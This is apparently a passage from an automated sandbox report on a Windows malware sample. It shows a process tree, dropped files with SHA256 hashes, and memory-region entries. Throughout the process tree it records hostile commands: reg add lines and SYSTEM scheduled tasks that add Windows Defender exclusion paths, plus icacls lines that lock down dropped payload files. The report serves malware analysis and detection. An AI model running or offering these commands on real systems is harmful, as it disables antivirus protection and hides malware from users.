                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:1564
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          PID:3308
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\Hds6Xa\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:4672
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                          3⤵
                                          • Indicator Removal: Clear Persistence
                                          • System Location Discovery: System Language Discovery
                                          PID:1444
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3032
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Run /TN "Task1"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2624
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Delete /TN "Task1" /F
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:396
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa\thumbs.db" /inheritance:r
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          PID:4460
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\Hds6Xa\thumbs.db" /inheritance:r
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:1872
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          PID:4336
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\Hds6Xa\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:2956
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          PID:5016
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\Hds6Xa\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:3756
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                          3⤵
                                          • Indicator Removal: Clear Persistence
                                          PID:3516
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            4⤵
                                              PID:4948
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                              4⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:4840
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              SCHTASKS /Run /TN "Task1"
                                              4⤵
                                                PID:2208
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                SCHTASKS /Delete /TN "Task1" /F
                                                4⤵
                                                  PID:992
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa\XPSPLOG.dll" /inheritance:r
                                                3⤵
                                                • Executes a command shell one-liner
                                                • System Location Discovery: System Language Discovery
                                                PID:1960
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Program Files (x86)\Hds6Xa\XPSPLOG.dll" /inheritance:r
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:1696
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                3⤵
                                                • Executes a command shell one-liner
                                                PID:3248
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Program Files (x86)\Hds6Xa\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:2272
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                                3⤵
                                                • Executes a command shell one-liner
                                                PID:4400
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Program Files (x86)\Hds6Xa\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:3324
                                          • C:\Windows\system32\cmd.exe
                                            cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\1FJnRi" /t REG_DWORD /d 0 /f
                                            1⤵
                                            • Executes a command shell one-liner
                                            • Suspicious use of WriteProcessMemory
                                            PID:2860
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\1FJnRi" /t REG_DWORD /d 0 /f
                                              2⤵
                                              • Windows security bypass
                                              PID:1804
                                          • C:\Windows\system32\cmd.exe
                                            cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                            1⤵
                                            • Executes a command shell one-liner
                                            • Suspicious use of WriteProcessMemory
                                            PID:4988
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                              2⤵
                                              • Windows security bypass
                                              PID:3308
                                          • C:\Windows\system32\cmd.exe
                                            cmd.exe
                                            1⤵
                                              PID:3044
                                            • C:\Windows\system32\cmd.exe
                                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                              1⤵
                                              • Executes a command shell one-liner
                                              • Suspicious use of WriteProcessMemory
                                              PID:4316
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                2⤵
                                                • Windows security bypass
                                                PID:740
                                            • C:\Windows\system32\cmd.exe
                                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                              1⤵
                                              • Executes a command shell one-liner
                                              • Suspicious use of WriteProcessMemory
                                              PID:2812
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                2⤵
                                                • Windows security bypass
                                                PID:4936
                                            • C:\Windows\system32\cmd.exe
                                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                              1⤵
                                              • Executes a command shell one-liner
                                              • Suspicious use of WriteProcessMemory
                                              PID:4072
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                2⤵
                                                • Windows security bypass
                                                PID:1312
                                            • C:\Program Files (x86)\Hds6Xa\Hds6Xa.exe
                                              "C:\Program Files (x86)\Hds6Xa\Hds6Xa.exe"
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:3468
                                            • C:\Program Files (x86)\Lxu29Pv\b1zJf7c5.exe
                                              "C:\Program Files (x86)\Lxu29Pv\b1zJf7c5.exe"
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:3908
                                            • C:\Windows\system32\cmd.exe
                                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                              1⤵
                                              • Executes a command shell one-liner
                                              PID:2152
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                2⤵
                                                • Windows security bypass
                                                PID:1700
                                            • C:\Windows\system32\cmd.exe
                                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                              1⤵
                                              • Executes a command shell one-liner
                                              PID:4024
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                2⤵
                                                • Windows security bypass
                                                PID:3764
                                            • C:\Windows\system32\cmd.exe
                                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                              1⤵
                                              • Executes a command shell one-liner
                                              PID:4996
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                2⤵
                                                  PID:1176
                                              • C:\Windows\system32\cmd.exe
                                                cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                1⤵
                                                • Executes a command shell one-liner
                                                PID:872
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                  2⤵
                                                    PID:3264

                                                Network

                                                      MITRE ATT&CK Enterprise v16

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      e58774f.rbs

                                                      • Path C:\Config.Msi\e58774f.rbs
                                                      • Size 7KB
                                                      • SHA256 884b425b4a2e405fb12d5c1bc35c8e0f0a2faadc07124471a1f3a35dbab3c55a
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      Hds6Xa.exe

                                                      • Path C:\Program Files (x86)\Hds6Xa\Hds6Xa.exe
                                                      • Size 145KB
                                                      • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      XPSPLOG.dll

                                                      • Path C:\Program Files (x86)\Hds6Xa\XPSPLOG.dll
                                                      • Size 4.6MB
                                                      • SHA256 e4930cc238efe9a9da975d510d27114340b1ea06e79cbbec80917f1729971590
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      image.png

                                                      • Path C:\Program Files (x86)\Hds6Xa\image.png
                                                      • Size 5.0MB
                                                      • SHA256 3cd0c4e776d49dd58669acc22dc3db34ac1274409a31666afdc893f795e69a1b
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      thumbs.db

                                                      • Path C:\Program Files (x86)\Hds6Xa\thumbs.db
                                                      • Size 358KB
                                                      • SHA256 8b881745f77a2aef0127fcdabc573a34cc2855f0c63eadaba5baca910b338fbf
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      XPSPLOG.dll

                                                      • Path C:\Program Files (x86)\Lxu29Pv\XPSPLOG.dll
                                                      • Size 4.6MB
                                                      • SHA256 8580b7a73c946180ce33a33eb742ce8d8a7d12ed1c399986c61e5a108bf3c359
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      image.png

                                                      • Path C:\Program Files (x86)\Lxu29Pv\image.png
                                                      • Size 5.0MB
                                                      • SHA256 c551b4c9e91d8afec7b070f41fa624ef9d9555c83bff87c2409cc15fddc4384e
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      C7pnKJ.exe

                                                      • Path C:\Users\Public\1FJnRi\C7pnKJ.exe
                                                      • Size 135KB
                                                      • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      UxEnhance64.dll

                                                      • Path C:\Users\Public\1FJnRi\UxEnhance64.dll
                                                      • Size 3.1MB
                                                      • SHA256 ff6f6797cb0a4525437e0f3d25a7704f518bcfdf3864f3d8ff2f134e363aede7
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      adoresd.dat

                                                      • Path C:\Users\Public\1FJnRi\adoresd.dat
                                                      • Size 4.7MB
                                                      • SHA256 48597aa2f149902fb0637f59e61f5dd805f92bde1e00a5aad057855184d8a218
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      msadox.tb

                                                      • Path C:\Users\Public\1FJnRi\msadox.tb
                                                      • Size 8KB
                                                      • SHA256 23f2c053f342d2430afd774ba781420b0413cbb811004af20bd23fd4af8427eb
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      destopbak.ini

                                                      • Path C:\Users\Public\Music\destopbak.ini
                                                      • Size 2B
                                                      • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                                      • MD5 SHA1 SHA512

                                                      MSI7878.tmp

                                                      • Path C:\Windows\Installer\MSI7878.tmp
                                                      • Size 6.3MB
                                                      • SHA256 be221e82726189a2548dcf822d24fec746a1e5b0447c4bfdec2eefe28ce59a70
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      e58774e.msi

                                                      • Path C:\Windows\Installer\e58774e.msi
                                                      • Size 6.3MB
                                                      • SHA256 a6f7ed297b0ae9d065644307ff5686d634fbe529186a7a7cbd10b00746a1ae68
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      metadata-2

                                                      • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                                      • Size 24.1MB
                                                      • SHA256 cda24d80b0fe5f14e22a6b84f425e7af4c985a28691258eb9fa0442715420238
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      {c75e11a3-9f62-41f7-8a47-e9926aa988dd}_OnDiskSnapshotProp

                                                      • Path \??\Volume{d78106ee-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{c75e11a3-9f62-41f7-8a47-e9926aa988dd}_OnDiskSnapshotProp
                                                      • Size 6KB
                                                      • SHA256 0bd52f0fb8b82faa90ddec7679c0083ed4f119473c5cd76c44eb72590f388445
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      xxxx.ini

                                                      • Path \??\c:\xxxx.ini
                                                      • Size 2B
                                                      • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                                      • MD5 SHA1 SHA512

                                                      memory/1892-64-0x0000028492600000-0x0000028492E91000-memory.dmp

                                                      memory/1892-93-0x0000028492600000-0x0000028492E91000-memory.dmp

                                                      memory/1892-72-0x0000028492600000-0x0000028492E91000-memory.dmp

                                                      memory/1892-74-0x0000028492600000-0x0000028492E91000-memory.dmp

                                                      memory/1892-78-0x0000028492600000-0x0000028492E91000-memory.dmp

                                                      memory/1892-84-0x0000028493270000-0x00000284932FA000-memory.dmp

                                                      memory/1892-87-0x0000028493270000-0x00000284932FA000-memory.dmp

                                                      memory/1892-86-0x0000028493270000-0x00000284932FA000-memory.dmp

                                                      memory/1892-92-0x0000028492600000-0x0000028492E91000-memory.dmp

                                                      memory/1892-85-0x0000028493270000-0x00000284932FA000-memory.dmp

                                                      memory/1892-83-0x0000028490400000-0x000002849044E000-memory.dmp

                                                      memory/1892-73-0x0000028492600000-0x0000028492E91000-memory.dmp

                                                      memory/1892-71-0x0000028492600000-0x0000028492E91000-memory.dmp

                                                      memory/1892-66-0x00007FFC14D80000-0x00007FFC14D82000-memory.dmp

                                                      memory/1892-67-0x0000028492600000-0x0000028492E91000-memory.dmp

                                                      memory/1892-58-0x00007FFC14D70000-0x00007FFC14D72000-memory.dmp

                                                      memory/1892-59-0x00007FFBF7830000-0x00007FFBF7D4E000-memory.dmp

                                                      memory/2008-16-0x00007FFC0F730000-0x00007FFC0F740000-memory.dmp

                                                      memory/2008-44-0x00007FFC0F730000-0x00007FFC0F740000-memory.dmp

                                                      memory/2008-13-0x00007FFBF5E20000-0x00007FFBF6475000-memory.dmp

                                                      memory/2008-12-0x00007FFC14D70000-0x00007FFC14D72000-memory.dmp

                                                      memory/3384-188-0x00000000039F0000-0x00000000041F7000-memory.dmp

                                                      memory/3384-181-0x00000000039F0000-0x00000000041F7000-memory.dmp

                                                      memory/3384-207-0x00000000039F0000-0x00000000041F7000-memory.dmp

                                                      memory/3384-183-0x0000000001360000-0x0000000001361000-memory.dmp

                                                      memory/3384-216-0x0000000010000000-0x0000000010061000-memory.dmp

                                                      memory/3384-184-0x00000000039F0000-0x00000000041F7000-memory.dmp

                                                      memory/3384-219-0x00000000039F0000-0x00000000041F7000-memory.dmp

                                                      memory/3384-267-0x00000000039F0000-0x00000000041F7000-memory.dmp

                                                      memory/3384-177-0x00000000751D0000-0x000000007591A000-memory.dmp

                                                      memory/3384-176-0x0000000001340000-0x0000000001341000-memory.dmp

                                                      memory/3384-195-0x0000000001430000-0x0000000001444000-memory.dmp

                                                      memory/3468-247-0x0000000000FE0000-0x0000000000FE1000-memory.dmp

                                                      memory/3468-253-0x0000000000F40000-0x0000000000F41000-memory.dmp

                                                      memory/3468-248-0x0000000003AB0000-0x00000000042B7000-memory.dmp

                                                      memory/3468-236-0x0000000003AB0000-0x00000000042B7000-memory.dmp

                                                      memory/3468-229-0x0000000000F40000-0x0000000000F41000-memory.dmp

                                                      memory/3468-230-0x00000000751D0000-0x000000007591A000-memory.dmp

                                                      memory/3908-241-0x0000000073EF0000-0x000000007463A000-memory.dmp

                                                      memory/3908-240-0x0000000000B20000-0x0000000000B21000-memory.dmp

                                                      memory/3908-245-0x0000000003180000-0x0000000003987000-memory.dmp

                                                      memory/3908-256-0x0000000003180000-0x0000000003987000-memory.dmp

                                                      memory/3908-255-0x0000000000C50000-0x0000000000C51000-memory.dmp

                                                      memory/3908-259-0x0000000000B20000-0x0000000000B21000-memory.dmp